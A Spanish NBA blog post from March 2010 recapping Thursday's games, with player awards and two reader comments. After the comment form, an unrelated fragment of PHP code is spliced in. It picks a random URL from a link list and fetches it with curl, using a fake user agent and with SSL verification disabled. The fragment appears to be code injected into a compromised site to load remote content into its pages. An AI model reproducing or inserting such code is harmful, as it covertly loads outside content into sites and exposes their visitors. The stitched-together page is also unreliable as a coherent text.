La Crónica (11/03/2010)

12 de March de 2010 por txusma

Jornada extremadamente desangelada, con pocos partidos como suele ser habitual los jueves pero sin el caché que los caracteriza.

El plato principal debería de haber sido el Chicago@Orlando sinó fuera porque el equipo de Del Negro ya no está ni para molestar, ni se le espera. Mucho menos si Rose no se encuentra en condiciones físicas óptimas. El partido no tuvo historia aparte de que el público pidió durante todo el último cuarto la entrada a cancha de Adonal Foyle, pero su “ilustrísimo” Stan Van Gundy no tuvo a bien plegarse a los deseos de la cansina turba. Luego igual se queja de su falta de carisma.

Al menos sí pudimos disfrutar de cierta emoción en los otros dos encuentros. No terminamos de encontrar explicación a cómo los Blazers, frente a unos Warriors (llamémosles “Guerrillerillos” definitivamente) donde apenas jugaron 7 tíos a cada cual más bajito, la mitad de la D-league y la otra mitad que terminaron expulsados por faltas, con Brandon Roy en plan “Dies Irae” y 20 rebotes de ventaja (todavía parecen pocos) todavía se las vieran y se las desearan para doblegarles. Si es que llegaron a jugarse las castañas con Devean George, que uno estaba casi convencido de que estaba retirado… Nelson está loco, pero tiene puntos de genialidad de los que los Warriors deberían encontrar rendimiento.

Finalmente los Hawks también sufrieron para tumbar a unos Wizards extremadamente serios. No es fácil destrozar a los atléticos halcones bajo los tableros y Blatche y McGee parece que no tuvieron excesivos problemas para lograrlo. Les faltó un poco más de acierto en el tiro exterior, además de encontrar la manera de parar a Jamal Crawford. Una lástima de equipo que queda la sensación que tenía mimbres para haber disputado la postemporada. Nunca es tarde si la dicha es buena.

PREMIOS

MVP: Brandon Roy lideró al equipo en su lucha por clasificarse, a pesar de todas las dificultades, para los playoffs del Oeste. El 7 de los Blazers se fue a los 41 puntos y 8 rebotes en la victoria frente los Warriors.

Rookie: La pareja de rookies de los Bulls (Taj Gibson y James Jonhson) fue de lo más destacado de su equipo en la derrota sufrida frente los Magic. El ex de USC se fue a los 12 puntos y 9 rebotes, mientras que el de Wake Forest consiguió 13 puntos, 3 rebotes y 4 asistencias.Por su parte,  Stephen Curry anotó 15 puntos y recogió 5 rebotes en un nueva derrota de GS.

Sorpresa: Sin Haywood en los Wizards llega el momento de JaVale McGee, un jugador que llegó verdísimo a la liga. Poco a poco va cogiendo el tono y ayer se destapó con 20 puntos y 9 rebotes.

Decepción: Definitivamente, los mejores tiempos de Brad Miller ya pasaron. Ayer deambuló por la pista para, en 20 minutos, anotar 2 puntos y recoger 1 solo rebote. los Bulls dijeron adios a la temporada la noche de los traspasos

Esfuerzo en vano: Las ausencias del “Big Three” capitalino han permitido a Andrey Blatche asumir la responsabilidad y los galones que hacía tiempo se intuía que podían ser suyos. Anoche plantó cara a los Hawks con 30 puntos, 10 rebotes y 3 robos. Lástima que las 7 pérdidas ensombrezcan un poco su actuación.

Comenta

2 comentarios a esta entrada

  1. Dantley2 dice:
    #1

    McGee desde que no pone tapones, está fantástico. Quizá está aprendiendo a utilizar sus cualidades, aunque en lo que le he visto sigue siendo una autopista en defensa. Como aprenda en defensa, va a ser tremendo, quizá top-5 de centers, aunque tengo serias dudas de que aprenda por mucha familia baloncestística de la que venga

      Citar

  2. sergio dice:
    #2

    Creo que McGee puede ser el jugador que puede hacer un mate desde mas altura de toda la liga… tiene uno de esos fisicos que deberia valer por si solo para hacerse un hueco en la liga, pero eso ya no vale ni en la LEB…4

    Creo firmement que Don Nelson es un experto en sacar jugo a equipos pequeñs o medios, pero que se le acaban las ideas cuando ha tenido un equipo de gran potencial. Y desde luego creo que el roster de los Warriors solo permite un estilo de juego como el que esta imponiendo el señor Don. Posiblemente sea el juego interior mas pobre de la liga… y encima ha tenido lesionados durante gran parte de la campaña a alguno (o ambos) de sus pivots titulares: Biedrins y Turiaf.

    A mi desde luego me cae simpatico el equipo de Oakland este año… aunq no aspire a mucho. Lo prefiero a los Clippers, Minnesotta,….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>